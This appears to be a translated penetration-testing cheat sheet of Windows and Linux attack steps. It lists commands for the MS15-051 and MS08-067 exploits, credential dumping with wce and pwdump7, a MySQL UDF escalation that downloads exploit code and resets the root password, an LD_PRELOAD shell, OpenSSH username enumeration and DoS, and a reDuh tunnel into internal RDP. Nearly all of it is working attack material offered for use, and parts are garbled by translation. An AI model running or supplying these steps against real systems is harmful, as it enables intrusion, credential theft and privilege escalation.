https://technet.microsoft.com/en … letin/dn602597.aspx #ms15–051
https://www.fireeye.com/blog /thr … ble_apt28_useo.html
https://www.exploit-db.com/exploits/37049/
# Find if the target machine has a patch installed, enter the following command
wmic qfe get
wmic qfe | find “3057191”
# Upload the compiled application and run it
https://github.com/hfiref0x/CVE- … mpiled/Taihou64.exe
# By default it will execute cmd.exe with system privileges, but we need to change the source code To run our uploaded danger.exe
# https://github.com/hfiref0x/CVE-2015-1701 to download it and navigate to “main.c”
# Use wce.exe to get the clear text account password of the logged in user
http:/ /www.ampliasecurity.com/re … credentials-editor/
wce -w
# Use pwdump7 to get password hashes for other users
http://www.heise.de/download/pwdump.html
# we can try online hash Cracking tools such crackstation.net
MS08–067 — Do not use Metasploit
$ nmap -v -p 139, 445 — script=smb-check-vulns — script-args=unsafe=1 192.168.31.205
$ searchsploit ms08–067
$ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
```
MySQL Root Account privilege escalation
```
# Mysql Server version: 5.5.44–0ubuntu0.14.04.1 (Ubuntu)
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file(‘/home/user/raptor_udf2.so’));
mysql> select * from foo into dumpfile ‘/usr/lib/mysql/plugin/raptor_udf2.so’;
mysql> create function do_system returns integer soname ‘raptor_udf2.so’;
mysql> select * from mysql.func;
mysql> select do_system(‘echo “root:passwd” | chpasswd > /tmp/out; chown user:user /tmp/out’);
User:~$ su -
Password:
user:~# whoami
root
root:~# id
uid=0(root) gid=0(root) groups=0(root)
```
Use LD_PRELOAD injection program
```
$ wget https ://github.com/jivoi/pentest/ldpreload_shell.c
$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
$ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
` ``
Enumeration timing attack for OpenSSH users
Note: Enumeration Timing Attack is a Side Channel Attack, side channel attack refers to the use of information outside the channel, such as The speed of decryption / the way the chip pin voltage/ciphertext transmission flow and path are attacked during encryption and decryption, a word is described as “side knocking”. — Refer to the explanation from the shotgun.
Osueta is a python2 script for timing attacks on OpenSSH that uses a timing attack to enumerate OpenSSH usernames and, under certain conditions, DOS attacks on OpenSSH servers.
```
#Https://github.com/c0r3dump3d/osueta
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
```
Use ReDuh to construct a valid HTTP request to establish a TCP channel
Note: ReDuh is a tool for tunneling various other data over the HTTP protocol. It can forward the port of the intranet server to the local machine through the http/https tunnel to form a connected loop. Connect to the target server internal open port if the target server is on the intranet or if a port policy is made.
Right, the pro-ReDuh-Gui is called the port forwarding artifact.
```
# https://github.com/sensepost/reDuh
# Step 1
# Upload reDuh.jsp Target Server
$ http://192.168.10.50/uploads/reDuh.jsp
# Step 2
# Run reDuhClient
$ java on this machine -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
# Step 3
# Use nc connection management port
$ nc -nvv 127.0.0.1 1010
# Step 4
# Use the tunnel to forward the local port to the remote destination port
[createTunnel] 7777:172.16.0.4:3389
# Step 5
# Connect to remote
$ /usr/bin/rdesktop -g 1024x768 — P -z -xl -k en-us -r sound:off localhost:7777
